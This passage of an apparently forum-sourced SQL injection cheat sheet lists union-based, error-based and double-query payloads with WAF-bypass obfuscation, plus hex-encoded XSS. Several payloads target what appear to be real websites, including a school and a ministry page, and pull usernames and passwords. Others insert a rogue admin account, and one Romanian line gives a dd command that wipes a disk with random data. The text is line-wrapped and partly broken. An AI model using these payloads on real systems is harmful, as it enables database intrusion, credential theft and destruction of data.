  722. +And(select 1)=(select 0xAAAA)+union+select
  723. +1–
  724. +and (/*!select*/ 1)=(/*!select*/ 0xAA)+
  725. +and (/*!select*/ 1)=(/*!select*/ 0×414)+
  726. +And(select 1)=(select 0×4141414141414
  727. 141414141414141414141414141414
  728. 141414141414141414141414141414?1414
  729. 141414141414141414141414141414
  730. 141414141414141414141414141414
  731. 14141414141414141414 141414141414141
  732. 414141414141414141414141414141
  733. 4141414141414141414141414141414?141
  734. 414141414141414141414141414141
  735. 414141414141414141414141414141
  736. 41414141414141414141 414141414141414
  737. 141414141414141414141414141414
  738. 14141414141414141414141414141414141
  739. 414141414141414141414141414141
  740. 414141414141414141414141414141
  741. 41414141414141414141 414141414141414
  742. 141414141414141414141414141414
  743. 14141414141414141414141414141414141
  744. 414141414141414141414141414141
  745. 414141414141414141414141414141
  746. 41414141414141414141 414141414141414
  747. 141414141414141414141414141414
  748. 14141414141414141414141414141414141 4141)+
  749. ==============================
  750. ==============================
  751. ==============================
  752. =========================================
  753. [+] Group Concat:
  754. ==============================
  755. ==============================
  756. ==============================
  757. =========================================
  758. Group_Concat
  759. group_concat()
  760. /*!group_concat*/()
  761. grOUp_ConCat(/*!*/,0x3e,/*!*/)
  762. group_concat(,0x3c62723e)
  763. g%72oup_c%6Fncat%28%76%65rsion%28%29,
  764. %22testtest%22%29
  765. CoNcAt()
  766. CONCAT(DISTINCT Version())
  767. concat(,0x3a,)
  768. concat%00()
  769. %00CoNcAt()
  770. /*!50000cOnCat*/(/*!Version()*/)
  771. /*!50000cOnCat*/
  772. /**//*!12345cOnCat*/(,0x3a,)
  773. concat_ws()
  774. concat(0x3a,,0x3c62723e)
  775. /*!concat_ws(0x3a,)*/
  776. concat_ws(0x3a3a3a,version()
  777. CONCAT_WS(CHAR(32,58,32),version(),)
  778. ==============================
  779. ==============================
  780. ==============================
  781. =========================================
  782. ERROR BASED
  783. ==============================
  784. ==============================
  785. ==============================
  786. =========================================
  787. =21 or 1 group by concat_ws(0x3a,version(),floor
  788. (rand(0)*2)) having min(0) or 1–
  789. Database
  790. 21 and (select 1 from (select count(*),concat
  791. ((select(select concat(cast(database() as
  792. char),0x7e)) from information_schema.tables
  793. where table_schema=database() limit 0,1),floor
  794. (rand(0)*2))x from information_schema.tables
  795. group by x)a)
  796. Table_name
  797. and (select 1 from (select count(*),concat((select
  798. (select concat(cast(table_name as char),0x7e))
  799. from information_schema.tables where
  800. table_schema=database() limit 19,1),floor(rand
  801. (0)*2))x from information_schema.tables group
  802. by x)a)
  803. Columns
  804. 21 and (select 1 from (select count(*),concat
  805. ((select(select concat(cast(column_name as
  806. char),0x7e)) from information_schema.columns
  807. where table_name=0x73657474696e6773 limit
  808. 2,1),floor(rand(0)*2))x from information_sch
  809. ema.tables group by x)a)
  810. extract date
  811. http://www.aliqbalschools.org/index.php?
  812. mode=getpagecontent&pageID=21 and (select 1
  813. from (select count(*),concat((select(select concat
  814. (cast(concat(userName,0x7e,passWord) as
  815. char),0x7e)) from iqbal_iqbal.settings limit
  816. 0,1),floor(rand(0)*2))x from information_sch
  817. ema.tables group by x)a)
  818. Notice the limit function in the query
  819. A website can have more than 2 two databases,
  820. so increase the limit until you find all database
  821. names
  822. Example: limit 0,1 or limit 1,1 or limit 2,1
  823. ==============================
  824. ==============================
  825. ==============================
  826. =========================================
  827. Differences:
  828. Error Based Query for Database Extraction:
  829. ==============================
  830. ==============================
  831. ==============================
  832. =========================================
  833. and (select 1 from (select count(*),concat((select
  834. (select concat(cast(database() as char),0x7e))
  835. from information_schema.tables where
  836. table_schema=database() limit 0,1),floor(rand
  837. (0)*2))x from information_schema.tables group
  838. by x)a)
  839. Double Query for Database Extraction:
  840. and(select 1 from(select count(*),concat((select
  841. (select concat(0x7e,0×27,cast(database() as
  842. char),0×27,0x7e)) from information_sch
  843. ema.tables limit 0,1),floor(rand(0)*2))x from
  844. information_schema.tables group by x)a) and 1=1
  845. and(select 1 from(select count(*),concat((select
  846. (select (SELECT distinct
  847. concat(0x7e,0×27,cast(schema_name as
  848. char),0×27,0x7e) FROM information_sch
  849. ema.schemata LIMIT N,1)) from
  850. information_schema.tables limit 0,1),floor(rand
  851. (0)*2))x from information_schema.tables group
  852. by x)a) and 1=1
  853. and(select 1 from(select count(*),concat((select
  854. (select (SELECT distinct
  855. concat(0x7e,0×27,cast(table_name as
  856. char),0×27,0x7e) FROM information_sch
  857. ema.tables Where
  858. table_schema=0xhex_code_of_database_name
  859. LIMIT N,1)) from information_schema.tables limit
  860. 0,1),floor(rand(0)*2))x from
  861. information_schema.tables group by x)a) and 1
  862. ==============================
  863. ==============================
  864. ==============================
  865. =========================================
  866. WUBI +and+extractvalue(rand(),concat(0x3e,
  867. (select+concat(username,0x7e,password)+from
  868. +iw_users+limit+0,1)))–+
  869. ==============================
  870. ==============================
  871. ==============================
  872. =========================================
  873. Descarci orice linux live, bootezi dupa el si
  874. formatezi cu dd+urandom. De acolo nu mai
  875. recupereaza NIMENI ceva.
  876. Code: dd if=/dev/urandom of=/dev/sda bs=1M
  877. I’d say using concat(0xY)
  878. Y being ‘<script>alert(‘Text here’);</script>’ in
  879. hex
  880. union select concat(version,0x3c73637269707
  881. 43e616c6572742827706833776c272
  882. 93c2f7363726970743e)
  883. http://zerocoolhf.altervista.org/level2.php?id=-1
  884. %27%20union%20select%20*%20from
  885. %28%28select%201%29a%20join%20%28select
  886. %20version%28%29%29b%20join%20%28select
  887. %20database%28%29%29c%29 –+
  888. union select 1,group_concat(column_name),3
  889. FROM information_schema.columns WHERE
  890. table_name=concat(’0x’, hex(‘users’)
  891. =113′+and+0+union+select+1,(SELECT (@)
  892. FROM (SELECT(@:=0×00),(SELECT (@) FROM
  893. (information_schema.columns) WHERE
  894. (table_schema>=@) AND (@)IN (@:=CONCAT
  895. (@,0x3C7363726970743E616C6572742827
  896. ,’ [ ',table_schema,' ] >’,table_name,’ >
  897. ‘,column_name,0x27293B3C2F7363
  898. 726970743E))))x),3–+–
  899. injection in sql database add new user
  900. INSERT INTO admins (`name`,`password`,`email`)
  901. VALUES (‘unix’,'unixunix’,'unix_chro@
  902. yahoo.com’)
  903. +and+(select+1+from+(select+count(*),concat((
  904. select(select+concat(cast(table_nam e+as
  905. +char),0x7e))+from+information_schema.tables
  906. +where+table_schema=0xDATABASEHE X+limit
  907. +0,1),floor(rand(0)*2))x+from+informat
  908. ion_schema.tables+group+by+x)a)
  909. CHALLENGES
  910. Code:
  911. =(13)and(0)union(select(1),group_concat(colum
  912. n_name,0x3c62723e),(3)from(inf
  913. ormation_schema.columns)where(
  914. table_schema=database())and(ta
  915. ble_name=0×7365637572697479))–+-
  916. =12+and+false/*!union*/ /*!select*/
  917. 1,group_concat(0x3c62723e,/*!TabLe_NaMe*/
  918. ),2,concat(user(),0x2a,database(),0x2a,version
  919. ()),13,0x3c666f6e7420636f6c6f7
  920. 23d626c75653e3c68323e706833776c,15 from
  921. information_schema.tables where
  922. table_schema=0x66616272697a696
  923. f5f636572697070 LiMit 0,1–
  924. =/*!uNiOn*/ /*!SeLeCt*/ 1,concat(/*!version
  925. (),0x3a,0x3a,AdMinLoGiN,0x3a,0x3a*/),3 /*!
  926. fRoM*/ security–
  927. =121)+and(0)+/*!uNion*/+/*!seleCt*/
  928. +1,2,3,4,version(),6,7– -
  929. =121)/**/and false UNION(SELECT
  930. 1,2,3,4,5,6,7)–+-
  931. =121 div 0 ) /*!UNION*/ /*!SELECT*/
  932. 1,2,3,4,5,6,version()# |
  933. null’+union+select+1,2,count(schema_name),4,5
  934. +from+information_schema.schemata– x
  935. ==============================
  936. ==============================
  937. ==============================
  938. =========================================
  939. Error Based:
  940. ==============================
  941. ==============================
  942. ==============================
  943. =========================================
  944. +or+1+group+by+concat_ws(0x7e,version(),floor
  945. (rand(0)*2))+having+min(0)+or+1–
  946. or 1 group by concat(0x3a,(select substr
  947. (group_concat(username,0x3a,password),1,150)
  948. from rmdsz_user),floor(rand(0)*2)) having min(0)
  949. or 1– -
  950. or 1 group by concat_ws(0x7e,version(),floor
  951. (rand(0)*2)) having min(0) or 1 — -
  952. and (select 1 from (select count(*),concat((select
  953. (select concat(cast(database() as char),0x7e))
  954. from information_schema.tables where
  955. table_schema=database() limit 0,1),floor(rand
  956. (0)*2))x from information_schema.tables group
  957. by x)a)
  958. +AND(SELECT COUNT(*) FROM (SELECT 1 UNION
  959. SELECT null UNION SELECT !1)x GROUP by
  960. CONCAT((SELECT version() FROM
  961. information_schema.tables LIMIT 0,1),FLOOR
  962. (RAND(0)*2)))
  963. +and+(select+1+from+(select+count(*)+from+(se
  964. lect+1+union+select+2+union+select+ 3)x+group
  965. +by+concat(mid((select+concat_ws(0x7
  966. e,version(),0x7e)+from+information_
  967. schema.tables+limit+0,1),1,25),floor(rand(0)*
  968. 2)))a)– x
  969. or 1=convert(int,(@@version))-
  970. +or+1+group+by+concat_ws(0x7e,version(),floor
  971. (rand(0)*2))+having+min(0)+or+1–
  972. +and+(select+1+from+(select+count(*),concat((
  973. select(select+concat(c ast(count(schem
  974. a_name)+as+char),0x7e))+from+i
  975. nformation_schema.schemata+limit+0, 1),floor
  976. (rand(0)*2))x+from+information_schema.tables
  977. +group+by+x)a)
  978. (42)and(0)union(select(1),2,version(),4,5,0x3
  979. c623e3c666f6e7420636f6c6f723d6
  980. 26c75653e706833776c,7,8,9,(10))–+-
  981. ==============================
  982. ==============================
  983. ==============================
  984. =========================================
  985. WAF BYPASS BY TOTTI
  986. ==============================
  987. ==============================
  988. ==============================
  989. =========================================
  990. =-2/*1337*/UNION/*1337*/(SELECT/*1337*/
  991. 1337,concat_ws(0x203a20,0x746f7
  992. 474693933,table_nam e)/*1337*/FROM/*1337*/
  993. INFORMATION_SCHEMA./*!TABLES*//*1337*/
  994. WHERE/*1337*/TABLE_SCHEMA=database())– -
  995. =2+and(0)+union+distinctROW+select+1,/*!
  996. 50000CoNcaT*/(0x706833776c,0x
  997. 3a,table_name) /*!froM*/ /*!InfORmaTion_sc
  998. Hema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/
  999. =database()– -
  1000. ==============================
  1001. ==============================
  1002. ==============================
  1003. =========================================
  1004. WUBI – 1,(select(@x)from(select(@x:=0×00),
  1005. (select(0)from(information_schema.column
  1006. s)where(table_schema!=0×69)and(0×00)in
  1007. (@x:=concat(@x,0x3c62723e,table_schem
  1008. a,0x2020203d3e3e202020,table_n
  1009. ame,0x20203a3a3a32020,column_n
  1010. ame))))x),3,4–
  1011. (select (@) from (select(@:=0×00),(select (@)
  1012. from (information_schema.columns) where
  1013. (table_schema>=@) and (@)in (@:=concat(@,0x
  1014. 0a,’ [ ',table_schema,' ] >’,table_name,’ >
  1015. ‘,column_name))))x)
  1016. (select (@) from (select (@x:=0×00),(select (@)
  1017. from (database.table) where (@) in (@:=concat
  1018. (@,0x0a,columns)))x)
  1019. (select (@) from (select (@x:=0×00),(select (@)
  1020. from (database.table) where (@) in (@:=concat
  1021. (@,0x0a,columns)))x)
  1022. ==============================
  1023. ==============================
  1024. ==============================
  1025. =========================================
  1026. +and+1=convert(int,SERVERPROPERTY
  1027. (‘ProductVersion’))
  1028. ==============================
  1029. ==============================
  1030. ==============================
  1031. =========================================
  1032. http://zerofreak.blogspot.it/2012/02/tutorial-by-
  1033. zer0freak-zer0freak-sqli.html
  1034. http://www.websec.ca/kb/sql_injection
  1035. http://www.hellboundhackers.org/articles/862-
  1036. mysql-injection-complete-tutorial.html
  1037. ==============================
  1038. ==============================
  1039. ==============================
  1040. =========================================
  1041. test
  1042. http://www.mt.ro/nou/articol.php?id=-
  1043. angajari’+and+extractvalue(rand(),concat(0x3e,
  1044. (select+concat(username,0x7e,password)+from
  1045. +iw_users+limit+0,1)))–+